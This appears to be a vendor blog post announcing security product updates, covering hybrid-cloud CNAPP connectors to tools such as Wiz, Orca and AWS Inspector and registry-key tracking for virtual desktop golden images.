Bridging the hybrid cloud gap with native and third-party CNAPP connectors

For many organizations, the challenge isn’t just securing the cloud – it’s securing everything holistically. Hybrid environments that span on-prem systems and multiple cloud providers can create silos, leading to gaps in visibility and risk management. To tackle this, we’ve integrated InsightCloudSec data directly into Surface Command, empowering security teams with a unified view of their entire attack surface in one place.

But we didn’t stop at consolidating our own native CNAPP capabilities. Teams now get out-of-the-box integrations with popular cloud security tools like Wiz and Orca as well as CSP-native services like AWS Inspector, all making it easier than ever to identify risks across cloud-native and hybrid environments. Everything can now be seen in one place – from endpoint vulnerabilities to cloud misconfigurations and overly permissive roles – allowing for faster action with clarity and precision.

Tackling virtual desktop risks with custom registry keys

With the rise of remote work, virtual desktop infrastructures (VDIs) like AWS Workspaces have become essential. Yet, their dynamic nature makes tracking vulnerabilities a challenge. Exposure Command addresses this with features like custom registry keys for golden images, ensuring you can trace a risk back to its source and effectively prioritize remediation.

Commanding the cloud attack surface

The challenges of securing modern environments aren’t going away. Attack surfaces will continue to expand, threats will grow more sophisticated, and organizations will face increasing pressure to innovate securely.

Keep an eye out for more updates coming soon as we continue to invest in helping organizations effectively manage exposures from endpoint to cloud.